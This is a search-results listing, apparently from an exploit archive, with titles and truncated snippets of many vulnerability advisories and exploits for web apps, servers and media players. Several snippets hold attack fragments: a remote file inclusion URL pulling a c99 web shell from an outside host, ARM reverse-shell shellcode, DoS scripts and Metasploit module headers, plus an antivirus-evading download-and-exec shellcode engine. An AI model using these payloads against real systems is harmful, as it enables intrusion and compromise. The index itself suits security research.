56796 matches found
Aj Classifieds - For Sale 3.0 - Remote Shell Upload Vulnerability
No description provided by source. AJClassifieds Merchandise RFu script down: http://www.ajclassifieds.net/demo/ajclassifiedsme/ClassifiedsMerchandise/ ---------------------------------------------------------- Discovered By: ZoRLu msn: [email protected] Date: 16.01.09 Home: z0rlu.blogspot.com...
EWay 4 Default.APSX Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/22528/info eWay is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser ...
DirectAdmin 1.28/1.29 CMD_EMAIL_VACATION_MODIFY user Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/21049/info DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the...
Bookmark4U 2.0 inc/dbase.php env[include_prefix] Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/18281/info Bookmark4U is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issues to includ...
File117 Multiple Remote File Include Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/23600/info File117 is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the...
VU Case Manager Authentication Bypass
No description provided by source. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ /'\ \ /\ \ \ \ /'\ 0 0 \ \ /\ /\ \ \ \ /\ \ \ /\ /\ \ \ \ \ \ \ / 1 1 \ \ \ \\ \ \ /\ \...
Irix LPD tagprinter - Command Execution
No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...
Serva 2.0.0 - HTTP Server GET Remote Denial of Service Vulnerability
No description provided by source. !/usr/bin/python Exploit Title: Serva v2.0.0 HTTP Server GET Remote Denial of Service Vulnerability Version: v2.0.0 Date: 2013-01-14 Author: Julien Ahrens @MrTuxracer Homepage: www.inshell.net Software Link: http://www.vercot.com Tested on: Windows XP SP3...
Libra File Manager 1.18/2.0 'fileadmin.php' Local File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/31403/info Libra File Manager is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability using directory-traversal strings to view...
PHPFox 3.6.0 (build3) Multiple SQL Injection Vulnerabilities
No description provided by source. ------------------------------------------------------------ PHPFox v3.6.0 build3 Multiple SQL Injection vulnerabilities ------------------------------------------------------------ == Description == - Software link: http://www.phpfox.com - Affected versions:...
XChat <= 2.6.7 (win version) Remote Denial of Service Exploit (perl)
No description provided by source. !/usr/bin/perl rewritten because perl is more elegant than php payload taken from original that ratboy submitted use strict; use Net::IRC; my $nick, $server, $port, $channel, $victim = @ARGV; my $irc = new Net::IRC; my $connect = $irc - newconn Nick = $nick,...
Wikepage Opus 13 2007.2 - 'wiki' Parameter Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/28842/info Wikepage Opus is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of a...
Picturesolution <= 2.1 - (config.php path) Remote File Inclusion Vuln
No description provided by source. Picturesolution = v2.1 config.php path Remote File Inclusion Vulnerabilities Found By : Mogatil , http://www.hackteach.org/cc/ Posted By : Cold z3ro , http://www.hackteach.org/cc/ Exploit : /install/config.php?path=http://membres.lycos.fr/prirato1/c99.txt? Examp...
WAN Emulator 2.3 - Command Execution
No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...
m-phorum 0.3 Index.PHP Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/25394/info m-phorum is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the...
TekBase All-in-One 3.1 - Multiple SQL Injection Vulnerabilities
No description provided by source. Author: n3wb0ss Date: 15/06/09 Contact: [email protected] Software: TekBase All-in-One 3.1 Vendor: tekbase.de Example: http://demo.tekbase.de/ Vendor contacted: No Risk: High I found this website on a german board, looking for another script. Looks to me, li...
NewLife Blogger <= 3.0 Insecure Cookie Handling / SQL Injection Vuln
No description provided by source. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= NewLife Blogger = v3.0 / Insecure Cookie Handling & SQL Injection Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= $ Program: NewLife...
Jetbox CMS 2.1 - Multiple SQL Injection Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/24077/info Jetbox is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromis...
WebEx GPCContainer Memory Access Violation Multiple Denial of Service Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/26430/info WebEx is prone to multiple remote denial-of-service vulnerabilities. Attackers can exploit these issues to crash applications that use the ActiveX control, denying service to legitimate users. html head script...
FTPshell Server <= 3.38 Remote Denial of Service Exploit
No description provided by source. !/usr/bin/perl Usage: FTPShellFTPDOS.pl ip user pass FTPShellFTPDOS.pl 127.0.0.1 hello moto FTPshell Server Version 3.38 Download: http://www.ftpshell.com/ use IO::Socket; use Win32; use strict; my$i = ; my$socket = ; for $i = 1; $i = 40; $i++ if $socket =...
IE9, SharePoint, Lync toStaticHTML HTML Sanitizing Bypass
No description provided by source. toStaticHTML: The Second Encounter CVE-2012-1858 HTML Sanitizing Bypass - CVE-2012-1858http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1858 Original advisory -...
Microsoft Windows Vista/Server 2008 "nsiproxy.sys" Local Kernel DoS Exploit
No description provided by source. !/usr/bin/python Title: Microsoft Windows Vista/Server 2008 nsiproxy.sys Local Kernel DoS Exploit Author: Lufeng Li of Neusoft Corporation Vendor: www.microsoft.com Vulnerable: Windows Vista/Server 2008 from ctypes import kernel32 = windll.kernel32 Psapi =...
Download & Exec polymorphed shellcode Engine
No description provided by source. Download & Exec polymorphed shellcode engine POC This downloading and execution code is not detectable by popular AVs. Greetz 2: DarkEagle and Unl0ck researcherz; Str0ke and milw0rm; HD Moor and metasploit project; Maxus, Fuchunic, YrSam, Garry; Offtopic and PTT...
MS IE 5.0 Download Behavior Vulnerability
No description provided by source. Microsoft Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4 Download Behavior Vulnerability source: http://www.securityfocus.com/bid/674/info The download behavior feature of Microsoft's Internet Explorer 5 may allow a malicious web site operator to...
Wordpress Twitget Plugin 3.3.1 - Multiple Vulnerabilities
No description provided by source. Details ================ Software: Twitget Version: 3.3.1 Homepage: http://wordpress.org/plugins/twitget/ Advisory ID: dxw-1970-435 CVE: CVE-2014-2559 CVSS: 6.4 Medium; AV:N/AC:L/Au:N/C:P/I:P/A:N Description ================ CSRF/XSS vulnerability in Twitget 3.3...
Versant Object Database <= 7.0.1.3 Commands Execution Exploit
No description provided by source. Versant server = 7.0.1.3 Arbitrary Commands Execution Exploit Exploit-DB mirror: http://www.exploit-db.com/sploits/2008-versantcmd.zip milw0rm.com 2008-03-04...
Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (2)
No description provided by source. source: http://www.securityfocus.com/bid/4485/info A heap overflow condition in the 'chunked encoding transfer mechanism' related to Active Server Pages has been reported for Microsoft IIS Internet Information Services. This condition affects IIS 4.0 and IIS 5.0...
Pirelli Discus DRG A125g - Remote Change SSID Value Vulnerability
No description provided by source...
Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (4)
No description provided by source. source: http://www.securityfocus.com/bid/7294/info A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for...
Splunk <= 4.3.3 Arbitrary File Read
No description provided by source. Exploit Title: Splunk = 4.3.3 Reading Arbitrary Files Contents Date: 09/03/2012 Exploit Author: Marcio Almeida [email protected] Vendor Homepage: http://www.splunk.com/ Software Link: http://www.splunk.com/download?r=header Version: 4.3.3 and priors...
Ultra Mini HTTPD 1.21 - Stack Buffer Overflow
No description provided by source. Exploit Title: Ultra Mini HTTPD stack buffer overflow Date: 10 July 2013 Exploit Author: superkojiman - http://www.techorganic.com Vendor Homepage: http://www.picolix.jp/ Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html Version: 1.21 Tested on...
CPanel <= 11 PassWDMySQL Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/22474/info cPanel is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browse...
Joomla Component com_biblestudy LFI Vulnerability
No description provided by source. @=======================================@ @=Script : Joomla Component combiblestudy @=Author : FL0RiX @=Greez : Deep-Power ,Pyske,Wretch-x & All Friends @=Bug Type : Local File Inlusion @=Dork : inurl:combiblestudy @=======================================@ @=Vul...
Roundcube Webmail 0.1 CSS Expression Input Validation Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/26800/info Roundcube Webmail is prone to an input-validation vulnerability because it fails to sanitize HTML email messages. Attackers can exploit this issue to execute arbitrary script code in the browser of an...
Magic Forum Personal view_thread.cfm Multiple Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/15774/info CFMagic Products are prone to multiple input validation vulnerabilities. These are due to a lack of proper sanitization of user-supplied input. These vulnerabilities allow an attacker to inject malicious SQL co...
Groovy Media Player 3.2.0 (.mp3) - Buffer Overflow Vulnerability
No description provided by source. Title: ==== Groovy Media Player 3.2.0 Buffer Overflow Vulnerability Credit: ====== Name: Akshaysinh Vaghela Company/affiliation: Cyberoam Technologies Private Limited Website: www.cyberoam.com CVE: ===== CVE-2013-2760 Reserved Date: ==== 21-03-2013 CL-ID: ====...
axoverzicht.CGI Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/17584/info The axoverzicht.cgi script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code executed ...
Shadow Stream Recorder 3.0.1.7 - Buffer Overflow
No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core'...
Intel Video Codecs 5.0 - Remote Denial of Service Vulnerability
No description provided by source...
[Raspberry Pi] Linux/ARM - reverse_shell(tcp,10.1.1.2,0x1337)
No description provided by source. / Title: Linux/ARM - reverseshelltcp,10.1.1.2,0x1337 execve/bin/sh, 0, 0 vars - 72 bytes Date: 2012-09-08 Tested on: ARM1176JZF-S v6l - Raspberry Pi Author: midnitesnake 00008054 start: 8054: e28f1001 add r1, pc, 1 8058: e12fff11 bx r1 805c: 2002 movs r0, 2 805e...
WeBid 1.0.6 - SQL Injection Vulnerability
No description provided by source. Exploit Title: WeBid 1.0.6 SQL Injection Vulnerability Google Dork: Powered by WeBid Date: 1/9/13 Exploit Author: Life Wasted Vendor Homepage: http://www.webidsupport.com/ Version: Tested on 1.0.6, but could affect other version Tested On: Linux, Windows...
PHP-Coolfile 1.4 Unauthorized Administrative Access Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/9018/info PHP-Coolfile allows unauthorized administrative access due to an error in the way access is evaluated in the action.php file. This could allow a remote user to obtain the administrative username and password for...
eCMS 0.4.2 - Multiple Security Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/29304/info eCMS is prone to multiple security vulnerabilities, including a security-bypass issue and an SQL-injection issue. Exploiting these issues may allow an attacker to bypass certain security restrictions and gain...
ecms 0.4.2 (sql/pb) Multiple Vulnerabilities
No description provided by source. ...::::eCMS-v0.4.2 SQL/PB Multiple Remote Vulnerabilities ::::... Virangar Security Team www.virangar.net -------- Discoverd By :virangar security teamhadihadi special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all hackerz greetz:to ...
Wikepage Opus 13 2007.2 - 'index.php' Multiple Directory Traversal Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/28664/info Wikepage Opus is prone to multiple directory-traversal vulnerabilities because the application fails to sufficiently sanitize user-supplied input. An attacker can exploit these issues using directory-traversal...
methane IRCd 0.1.1 - Remote Format String Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8038/info Behamut IRCd has been reported prone to remotely exploitable format string vulnerability. The issue presents itself when Behamut is compiled with DEBUGMODE defined. Reportedly a remote attacker may send maliciou...
Exploit: NCMedia Sound Editor Pro 7.5.1 - SEH & DEP
No description provided by source. !/usr/bin/python --------------------------------------------------------------------------- Exploit: NCMedia Sound Editor Pro v7.5.1 SEH&DEP Author: b33f - http://www.fuzzysecurity.com/ OS: Windows 7 Pro SP1 probably universal across 32-bit POC - Julien Ahrens ...
Microsoft Clip Art Gallery 5.0 - Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/1034/info A vulnerability exists within the Microsoft Clip Art Gallery, where a remote user can crash the Clip Art application or possibly execute arbitrary code. Clip art can be downloaded from any website and incorporat...
Jax PHP Scripts 1.0/1.34/2.14/3.31 jax_guestbook.php Multiple Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/14481/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. An attacker may leverage any of the...
Social Web CMS 2 'index.php' Cross Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/38329/info Social Web CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of ...